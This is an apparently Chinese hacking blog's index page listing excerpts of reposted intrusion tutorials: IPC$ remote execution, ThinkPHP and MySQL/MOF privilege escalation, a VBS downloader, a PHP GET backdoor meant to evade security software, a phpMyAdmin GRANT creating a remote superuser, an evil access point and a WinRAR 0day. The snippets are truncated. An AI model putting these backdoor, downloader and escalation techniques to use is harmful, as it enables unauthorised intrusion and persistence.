上一页 1 2 3 4 5 6 7 8 9 ··· 16 下一页
2016年1月23日
2014自己总结的渗透经验[转]
摘要: 有经验的老鸟们就不用看了。(大牛绕过)我们每当渗透一个站点的时候必须要了解他的信息。这是最基础也是最基本的常识。第一要看网站是什么脚本? 是什么程序? 有多少类的程序?系列:http://www.zzrsks.com/这个站点我们可以看出是伪静态的。那么如何判断他是属于什么脚本的呢?有很多种方法我就... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(497) 评论(0) 推荐(0)
利用NET HUNTER建立一个自动文件下载的网络接入点
摘要: 免责声明:本文旨在分享技术进行安全学习,禁止非法利用。 本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载。整个过程中我将使用 Nexus 9 来运行Kali NetHunter 2.0,并使用TP-LINK TLWN722N (150Mbps 版本)作为我的二级... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(993) 评论(1) 推荐(0)
内网渗透之IPC,远程执行
摘要: 开启服务 net start Schedulenet start wmiApSrv关闭防火墙 net stop sharedaccessnet use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$试环境:主机(w... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(7028) 评论(0) 推荐(0)
Thinkphp 漏洞小试
摘要: 首先确定这个网站使用thinkphp的框架国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考admin是后台工程文... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(5008) 评论(0) 推荐(0)
VBS下载者助以一臂之力
摘要: 当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望一、VBS下载者: 复制代码 代码如下:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObjec... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(517) 评论(0) 推荐(0)
Mof提权科普
摘要: 今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普这里我综合各类mof提权进行了综合首先说一下,无shell情况下的mysql远程mof提权利用方法详解 就是你注入拿到了数据库的root账号密码,直接进行 扫到一个站的注入 ... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(3290) 评论(0) 推荐(0)
PHP_GET后门,躲避任何安全软件
摘要: 经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。<?phpfile_put_contents('xpxp.php',"$_GET[... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(269) 评论(0) 推荐(0)
MYSQL提权总结
摘要: 经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(4864) 评论(0) 推荐(0)
PHPmyadmin拿shell总结
摘要: PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WIT... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(2172) 评论(0) 推荐(0)
WinRAR(5.21)-0day漏洞-始末分析
摘要: 0x00 前言 上月底,WinRAR 5.21被曝出代码执行漏洞,Vulnerability Lab将此漏洞评为高危级,危险系数定为9(满分为10),与此同时安全研究人员Mohammad Reza Espargham发布了PoC,实现了用户打开SFX文件时隐蔽执行攻击代码,但是WinRAR官... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(1252) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 8 9 ··· 16 下一页